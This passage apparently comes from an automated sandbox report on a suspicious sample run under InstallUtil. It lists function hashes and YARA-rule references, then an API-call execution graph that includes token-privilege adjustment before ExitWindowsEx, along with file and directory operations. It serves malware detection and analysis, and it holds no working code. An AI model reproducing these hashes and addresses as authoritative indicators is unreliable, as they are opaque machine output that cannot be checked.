                                                                                                                                                                                                                                  • Instruction ID: 8b0df7ac21511ab8c0bad5739e7efc132ac9be8e1028d1de05d49aae1b89bec3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cadd5f1db3279262fc0d48c274792b47698bf3680c7ff2b68f346bfbffe4aa5e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4141A431B00205CFCB14EB68D554AAEBBF2EF88314F248469E409EB399CB35DD81CB91
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 01810839 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3201208756.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_1810000_InstallUtil.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: aae9ae6f2304f3d7e8c77b8aac077f801fba1e89ad94a6a89c11b9ce9eea9098
                                                                                                                                                                                                                                  • Instruction ID: e2dd487562982c1c9bdeb2799dd2b31333b9a15b126ba3efcf6046ef699878cb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aae9ae6f2304f3d7e8c77b8aac077f801fba1e89ad94a6a89c11b9ce9eea9098
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8011A332744109CBD754DB68DD58BAE76B6AB88314F504068F502EB399CF758E818BD2
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 01810848 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3201208756.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_1810000_InstallUtil.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 51a27e5edc293d9a8a31edbb6953fc12b88bc93b4092baf2e91cd82d54024b9b
                                                                                                                                                                                                                                  • Instruction ID: e7ce8df4682e76eba80d66f368b90fe7b1bd530bf5fec9229a1d8f2dd8804272
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51a27e5edc293d9a8a31edbb6953fc12b88bc93b4092baf2e91cd82d54024b9b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B117331744105CBD714DB79DD58A6E76F6AB88314F604058E402E7398DF755E41CBD2
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 01811CB8 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3201208756.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_1810000_InstallUtil.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 60da65fe4f8a0d3e5255af51666bae76a07e02374949c22a455a0a551d0b327e
                                                                                                                                                                                                                                  • Instruction ID: fb052d8f9053a388febc5e15c7422dd1092cd21e88f1fd3a255a1860ac3dd562
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60da65fe4f8a0d3e5255af51666bae76a07e02374949c22a455a0a551d0b327e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C501F9323002016FC714E73DFD99A2FB79EE7C82507948138E51ADB348EE69EC468B90
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 01811CC8 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3201208756.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_1810000_InstallUtil.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 626a9b917a901c7367362efe467e1458873c861823db5b4254430e127b02b143
                                                                                                                                                                                                                                  • Instruction ID: 74219fa0483c7242f0ebb78b1625a3de3b27937a52b897269d74e13c2eedf00c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 626a9b917a901c7367362efe467e1458873c861823db5b4254430e127b02b143
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6F0C8313002026BCB14E73DF95892FB7DEEBC82503908139E51ADB348EE69DC468790
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 01810F62 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3201208756.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_1810000_InstallUtil.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: f794655ed58ddad72a6afd3173e95089f071a55e2f7c618f96e1a7b91f1000b8
                                                                                                                                                                                                                                  • Instruction ID: ab35ee839fa7a36420a1621473789207b776c24018d9d6d379ddfd8d738c6731
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f794655ed58ddad72a6afd3173e95089f071a55e2f7c618f96e1a7b91f1000b8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D01A2727002058FCB11E76CD9805ADB7A3ABD4314F108829D406DB358CF75AE858782
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 01812587 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3201208756.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_1810000_InstallUtil.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: f9b8f17d24389d162fc81e4a8d0ed56bc1d8c6a1faa3e80b3c421e67ad587708
                                                                                                                                                                                                                                  • Instruction ID: 90a0ef70947e400290f5e08314534a76080672a17239556e144f33085698f4f6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9b8f17d24389d162fc81e4a8d0ed56bc1d8c6a1faa3e80b3c421e67ad587708
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9AF0BE31B00208BFC728566DA904ABBABEAEBC8620F00007CE91DC3350CA2E4C0747A6
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 018117F0 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3201208756.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_1810000_InstallUtil.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 47529c308187647f4904c0712c7474f01b1823cfe997482397c8e0e3db300ecc
                                                                                                                                                                                                                                  • Instruction ID: de549e0ac86f273eb2f0250e970c13c44d59b101de0182a452805debd355b71d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47529c308187647f4904c0712c7474f01b1823cfe997482397c8e0e3db300ecc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FFF0E2327042602FC716166CA8106AB7BA9CBC5620F0900BAE509C7341C99E4C4743E2
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 01810D88 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3201208756.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_1810000_InstallUtil.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 3c5920d223ff055de927e4e79352e31b2b30c84bf49771e79d031dc987eb0928
                                                                                                                                                                                                                                  • Instruction ID: 6eebe8f0c398732679791ba8579e51cdd331ecf6493f066387620fae83ecc223
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c5920d223ff055de927e4e79352e31b2b30c84bf49771e79d031dc987eb0928
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09F0E9226043411FC3066739981506EFA9BBEC22503088ABFD55ECF795ED61DC4A47D3
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 018108F5 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3201208756.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_1810000_InstallUtil.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 806e4007292193533582a8e753bfb26c7eaf63ec30fd0fdbee1a627762fb2c8c
                                                                                                                                                                                                                                  • Instruction ID: 9d8b5f035943a0858a4347fda4b97366ffd9e45f313431af19a6410bd0db465e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 806e4007292193533582a8e753bfb26c7eaf63ec30fd0fdbee1a627762fb2c8c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FEF09632B00119CBDF14AB68986472E619BBF9474CF104069E506FB3ADCF399EC18797
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 018108FE Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3201208756.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_1810000_InstallUtil.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 4e309c882ca581db5a9980371b5bc3b5761652534668e192a42c516c60c52209
                                                                                                                                                                                                                                  • Instruction ID: 9057a01125fcf6d5906700495d937178f8107a8916feb2dd94be6e78d3125c21
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e309c882ca581db5a9980371b5bc3b5761652534668e192a42c516c60c52209
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68F0B422B40118CBDF14AB7C989462D2197BFD4B4CF000068E506FB3ADCE799EC187AA
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 01810879 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3201208756.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_1810000_InstallUtil.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 14e18ad4137d20ebdddaa530566cad831e05269e3df3658a51ca07004dc7e1cc
                                                                                                                                                                                                                                  • Instruction ID: c1b3c8727fee5db7ae62fafed74b95ef8dcfb43dfff375b57d1baa353679c116
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14e18ad4137d20ebdddaa530566cad831e05269e3df3658a51ca07004dc7e1cc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33F04F32784209CBC754EB6C8D94B7E76B6AB88718F204458F401EB359CB758E818BD2
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 01811C48 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3201208756.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_1810000_InstallUtil.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 9b4f04e2ac8760831af42403a7fe9cae2acd494ea5663aee622c10cdae276901
                                                                                                                                                                                                                                  • Instruction ID: bea67a2ae277774b957f28bc08a6fe0ad44ea328c9c845daa700b6bdc3772388
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9b4f04e2ac8760831af42403a7fe9cae2acd494ea5663aee622c10cdae276901
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98F0E27250D284AFCB02CB78D92528DBF74EB47204F9940EBD544C7262E5355E09C751
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 01811C68 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3201208756.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_1810000_InstallUtil.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: db250a6abc2f84d5bfa3760961d1e00a56bd82d368c596fb94c0d1d3b2115507
                                                                                                                                                                                                                                  • Instruction ID: cbfebdba16d45eb66fd1ad79df4d5b15699d31cb209e2f43f80b4bfed450aec6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db250a6abc2f84d5bfa3760961d1e00a56bd82d368c596fb94c0d1d3b2115507
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6CD01770A08109EF8B00DFB8EA0555DF7B9FB88200B9082A9E908D3204EA326E049B80
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 01810969 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3201208756.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_1810000_InstallUtil.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 040c8c8c2923b50e3da6a6788c933a276bafd14fad86a765f90eb583e00cc812
                                                                                                                                                                                                                                  • Instruction ID: 8471d1c0084a5665f7c5974e82162e2e036853b99696231659ecd7d0532bfb00
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 040c8c8c2923b50e3da6a6788c933a276bafd14fad86a765f90eb583e00cc812
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6BA0024255C41DD18B042BA69D94429540E96D1B4D30105365A175A5999C985BD1419F
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:21.3%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                  Signature Coverage:2.4%
                                                                                                                                                                                                                                  Total number of Nodes:1521
                                                                                                                                                                                                                                  Total number of Limit Nodes:22
                                                                                                                                                                                                                                  execution_graph 5453 407548 5454 407554 CloseHandle 5453->5454 5455 40755d 5453->5455 5454->5455 6690 402b48 RaiseException 5895 407749 5896 4076dc WriteFile 5895->5896 5897 407724 5895->5897 5898 4076e8 5896->5898 5899 4076ef 5896->5899 5897->5895 5903 4077e0 5897->5903 5901 40748c 35 API calls 5898->5901 5900 407700 5899->5900 5902 4073ec 34 API calls 5899->5902 5901->5899 5902->5900 5904 4078db InterlockedExchange 5903->5904 5906 407890 5903->5906 5905 4078e7 5904->5905 6691 40294a 6692 402952 6691->6692 6693 403554 4 API calls 6692->6693 6694 402967 6692->6694 6693->6692 6695 403f4a 6696 403f53 6695->6696 6697 403f5c 6695->6697 6699 403f07 6696->6699 6702 403f09 6699->6702 6701 403f3c 6701->6697 6704 403e9c 6702->6704 6705 403154 4 API calls 6702->6705 6710 403f3d 6702->6710 6722 403e9c 6702->6722 6703 403ef2 6707 402674 4 API calls 6703->6707 6704->6701 6704->6703 6708 403ea9 6704->6708 6713 403e8e 6704->6713 6705->6702 6711 403ecf 6707->6711 6708->6711 6712 402674 4 API calls 6708->6712 6710->6697 6711->6697 6712->6711 6714 403e4c 6713->6714 6715 403e67 6714->6715 6716 403e62 6714->6716 6717 403e7b 6714->6717 6720 403e78 6715->6720 6721 402674 4 API calls 6715->6721 6718 403cc8 4 API calls 6716->6718 6719 402674 4 API calls 6717->6719 6718->6715 6719->6720 6720->6703 6720->6708 6721->6720 6723 403ed7 6722->6723 6724 403ea9 6722->6724 6725 403ef2 6723->6725 6726 403e8e 4 API calls 6723->6726 6729 402674 4 API calls 6724->6729 6730 403ecf 6724->6730 6727 402674 4 API calls 6725->6727 6728 403ee6 6726->6728 6727->6730 6728->6724 6728->6725 6729->6730 6730->6702 6249 40ac4f 6250 40abc1 6249->6250 6251 4094d8 9 API calls 6250->6251 6253 40abed 6250->6253 6251->6253 6252 40ac06 6254 40ac1a 6252->6254 6255 40ac0f DestroyWindow 6252->6255 6253->6252 6256 40ac00 RemoveDirectoryA 6253->6256 6257 40ac42 6254->6257 6258 40357c 4 API calls 6254->6258 6255->6254 6256->6252 6259 40ac38 6258->6259 6260 4025ac 4 API calls 6259->6260 6260->6257 6261 403a52 6262 403a74 6261->6262 6263 403a5a WriteFile 6261->6263 6263->6262 6264 403a78 GetLastError 6263->6264 6264->6262 6265 402654 6266 403154 4 API calls 6265->6266 6268 402614 6266->6268 6267 402632 6267->6267 6268->6267 6269 403154 4 API calls 6268->6269 6269->6267 6270 40ac56 6271 40ac5d 6270->6271 6273 40ac88 6270->6273 6280 409448 6271->6280 6275 403198 4 API calls 6273->6275 6274 40ac62 6274->6273 6277 40ac80 MessageBoxA 6274->6277 6276 40acc0 6275->6276 6278 403198 4 API calls 6276->6278 6277->6273 6279 40acc8 6278->6279 6281 409454 GetCurrentProcess OpenProcessToken 6280->6281 6282 4094af ExitWindowsEx 6280->6282 6283 409466 6281->6283 6284 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6281->6284 6282->6283 6283->6274 6284->6282 6284->6283 6739 40995e 6740 409960 6739->6740 6741 409982 6740->6741 6742 40999e CallWindowProcA 6740->6742 6742->6741 6743 409960 6744 409982 6743->6744 6745 40996f 6743->6745 6745->6744 6746 40999e CallWindowProcA 6745->6746 6746->6744 6747 405160 6748 405173 6747->6748 6749 404e58 33 API calls 6748->6749 6750 405187 6749->6750 6285 402e64 6286 402e69 6285->6286 6287 402e7a RtlUnwind 6286->6287 6288 402e5e 6286->6288 6289 402e9d 6287->6289 5907 40766c SetFilePointer 5908 4076a3 5907->5908 5909 407693 GetLastError 5907->5909 5909->5908 5910 40769c 5909->5910 5911 40748c 35 API calls 5910->5911 5911->5908 6302 40667c IsDBCSLeadByte 6303 406694 6302->6303 6763 403f7d 6764 403fa2 6763->6764 6767 403f84 6763->6767 6766 403e8e 4 API calls 6764->6766 6764->6767 6765 403f8c 6766->6767 6767->6765 6768 402674 4 API calls 6767->6768 6769 403fca 6768->6769 6770 403d02 6772 403d12 6770->6772 6771 403ddf ExitProcess 6772->6771 6773 403db8 6772->6773 6776 403dea 6772->6776 6780 403da4 6772->6780 6781 403d8f MessageBoxA 6772->6781 6774 403cc8 4 API calls 6773->6774 6775 403dc2 6774->6775 6777 403cc8 4 API calls 6775->6777 6778 403dcc 6777->6778 6790 4019dc 6778->6790 6786 403fe4 6780->6786 6781->6773 6782 403dd1 6782->6771 6782->6776 6787 403fe8 6786->6787 6788 403f07 4 API calls 6787->6788 6789 404006 6788->6789 6791 401abb 6790->6791 6792 4019ed 6790->6792 6791->6782 6793 401a04 RtlEnterCriticalSection 6792->6793 6794 401a0e LocalFree 6792->6794 6793->6794 6795 401a41 6794->6795 6796 401a2f VirtualFree 6795->6796 6797 401a49 6795->6797 6796->6795 6798 401a70 LocalFree 6797->6798 6799 401a87 6797->6799 6798->6798 6798->6799 6800 401aa9 RtlDeleteCriticalSection 6799->6800 6801 401a9f RtlLeaveCriticalSection 6799->6801 6800->6782 6801->6800 6308 404206 6309 4041cc 6308->6309 6310 40420a 6308->6310 6311 403154 4 API calls 6310->6311 6312 404282 6310->6312 6313 404323 6311->6313 6314 402c08 6315 402c82 6314->6315 6318 402c19 6314->6318 6316 402c56 RtlUnwind 6317 403154 4 API calls 6316->6317 6317->6315 6318->6315 6318->6316 6321 402b28 6318->6321 6322 402b31 RaiseException 6321->6322 6323 402b47 6321->6323 6322->6323 6323->6316 6324 408c10 6325 408c17 6324->6325 6326 403198 4 API calls 6325->6326 6333 408cb1 6326->6333 6327 408cdc 6328 4031b8 4 API calls 6327->6328 6329 408d69 6328->6329 6330 408cc8 6332 4032fc 18 API calls 6330->6332 6331 403278 18 API calls 6331->6333 6332->6327 6333->6327 6333->6330 6333->6331 6334 4032fc 18 API calls 6333->6334 6334->6333 6339 40a814 6340 40a839 6339->6340 6341 40993c 29 API calls 6340->6341 6344 40a83e 6341->6344 6342 40a891 6373 4026c4 GetSystemTime 6342->6373 6344->6342 6348 408dd8 18 API calls 6344->6348 6345 40a896 6346 409330 46 API calls 6345->6346 6347 40a89e 6346->6347 6349 4031e8 18 API calls 6347->6349 6350 40a86d 6348->6350 6351 40a8ab 6349->6351 6353 40a875 MessageBoxA 6350->6353 6352 406928 19 API calls 6351->6352 6354 40a8b8 6352->6354 6353->6342 6355 40a882 6353->6355 6356 4066c0 19 API calls 6354->6356 6357 405864 19 API calls 6355->6357 6358 40a8c8 6356->6358 6357->6342 6359 406638 19 API calls 6358->6359 6360 40a8d9 6359->6360 6361 403340 18 API calls 6360->6361 6362 40a8e7 6361->6362 6363 4031e8 18 API calls 6362->6363 6364 40a8f7 6363->6364 6365 4074e0 37 API calls 6364->6365 6366 40a936 6365->6366 6367 402594 18 API calls 6366->6367 6368 40a956 6367->6368 6369 407a28 19 API calls 6368->6369 6370 40a998 6369->6370 6371 407cb8 35 API calls 6370->6371 6372 40a9bf 6371->6372 6373->6345 5451 407017 5452 407008 SetErrorMode 5451->5452 6374 403018 6375 403070 6374->6375 6376 403025 6374->6376 6377 40302a RtlUnwind 6376->6377 6378 40304e 6377->6378 6380 402f78 6378->6380 6381 402be8 6378->6381 6382 402bf1 RaiseException 6381->6382 6383 402c04 6381->6383 6382->6383 6383->6375 6388 40901e 6389 409010 6388->6389 6390 408fac Wow64RevertWow64FsRedirection 6389->6390 6391 409018 6390->6391 6392 409020 SetLastError 6393 409029 6392->6393 6408 403a28 ReadFile 6409 403a46 6408->6409 6410 403a49 GetLastError 6408->6410 5912 40762c ReadFile 5913 407663 5912->5913 5914 40764c 5912->5914 5915 407652 GetLastError 5914->5915 5916 40765c 5914->5916 5915->5913 5915->5916 5917 40748c 35 API calls 5916->5917 5917->5913 6812 40712e 6813 407118 6812->6813 6814 403198 4 API calls 6813->6814 6815 407120 6814->6815 6816 403198 4 API calls 6815->6816 6817 407128 6816->6817 5932 40a82f 5933 409ae8 18 API calls 5932->5933 5934 40a834 5933->5934 5935 40a839 5934->5935 5936 402f24 5 API calls 5934->5936 5969 40993c 5935->5969 5936->5935 5938 40a891 5974 4026c4 GetSystemTime 5938->5974 5940 40a83e 5940->5938 6035 408dd8 5940->6035 5941 40a896 5975 409330 5941->5975 5945 4031e8 18 API calls 5947 40a8ab 5945->5947 5946 40a86d 5949 40a875 MessageBoxA 5946->5949 5993 406928 5947->5993 5949->5938 5951 40a882 5949->5951 6038 405864 5951->6038 5956 40a8d9 6020 403340 5956->6020 5958 40a8e7 5959 4031e8 18 API calls 5958->5959 5960 40a8f7 5959->5960 5961 4074e0 37 API calls 5960->5961 5962 40a936 5961->5962 5963 402594 18 API calls 5962->5963 5964 40a956 5963->5964 5965 407a28 19 API calls 5964->5965 5966 40a998 5965->5966 5967 407cb8 35 API calls 5966->5967 5968 40a9bf 5967->5968 6042 40953c 5969->6042 5972 4098cc 19 API calls 5973 40995c 5972->5973 5973->5940 5974->5941 5978 409350 5975->5978 5979 409375 CreateDirectoryA 5978->5979 5983 408dd8 18 API calls 5978->5983 5985 404c94 33 API calls 5978->5985 5988 407284 19 API calls 5978->5988 5991 408da8 18 API calls 5978->5991 5992 405890 18 API calls 5978->5992 6098 406cf4 5978->6098 6121 409224 5978->6121 5980 4093ed 5979->5980 5981 40937f GetLastError 5979->5981 5982 40322c 4 API calls 5980->5982 5981->5978 5984 4093f7 5982->5984 5983->5978 5986 4031b8 4 API calls 5984->5986 5985->5978 5987 409411 5986->5987 5989 4031b8 4 API calls 5987->5989 5988->5978 5990 40941e 5989->5990 5990->5945 5991->5978 5992->5978 6227 406820 5993->6227 5996 403454 18 API calls 5997 40694a 5996->5997 5998 4066c0 5997->5998 6232 4068e4 5998->6232 6001 4066f0 6003 403340 18 API calls 6001->6003 6002 4066fe 6004 403454 18 API calls 6002->6004 6005 4066fc 6003->6005 6006 406711 6004->6006 6008 403198 4 API calls 6005->6008 6007 403340 18 API calls 6006->6007 6007->6005 6009 406733 6008->6009 6010 406638 6009->6010 6011 406642 6010->6011 6012 406665 6010->6012 6238 406950 6011->6238 6013 40322c 4 API calls 6012->6013 6015 40666e 6013->6015 6015->5956 6016 406649 6016->6012 6017 406654 6016->6017 6018 403340 18 API calls 6017->6018 6019 406662 6018->6019 6019->5956 6021 403344 6020->6021 6022 4033a5 6020->6022 6023 4031e8 6021->6023 6024 40334c 6021->6024 6029 403254 18 API calls 6023->6029 6030 4031fc 6023->6030 